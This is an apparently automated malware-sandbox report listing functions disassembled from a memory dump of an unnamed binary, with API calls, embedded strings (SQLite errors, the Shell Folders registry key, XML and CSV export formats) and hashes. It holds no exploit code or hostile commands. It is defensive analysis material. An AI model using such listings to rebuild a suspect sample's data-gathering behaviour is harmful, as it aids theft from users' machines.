                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$_snwprintf
                                                                                                                                                                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                              • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                              • String ID: %2.2X
                                                                                                                                                                                                                              • API String ID: 2521778956-791839006
                                                                                                                                                                                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                              • API String ID: 999028693-502967061
                                                                                                                                                                                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2350177629-0
                                                                                                                                                                                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                              • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                              • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 265355444-0
                                                                                                                                                                                                                              • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4131475296-0
                                                                                                                                                                                                                              • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                              • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFilefreememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2507021081-0
                                                                                                                                                                                                                              • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                              • free.MSVCRT ref: 00417544
                                                                                                                                                                                                                              • free.MSVCRT ref: 00417562
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4131324427-0
                                                                                                                                                                                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                              • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PathTemp$free
                                                                                                                                                                                                                              • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                              • API String ID: 924794160-1420421710
                                                                                                                                                                                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                              • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                              • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                              • String ID: General
                                                                                                                                                                                                                              • API String ID: 999786162-26480598
                                                                                                                                                                                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                              • String ID: Error$Error %d: %s
                                                                                                                                                                                                                              • API String ID: 313946961-1552265934
                                                                                                                                                                                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                              • API String ID: 0-1953309616
                                                                                                                                                                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                              • API String ID: 3510742995-272990098
                                                                                                                                                                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                                              • String ID: gj
                                                                                                                                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                                                              • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??3@$free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2241099983-0
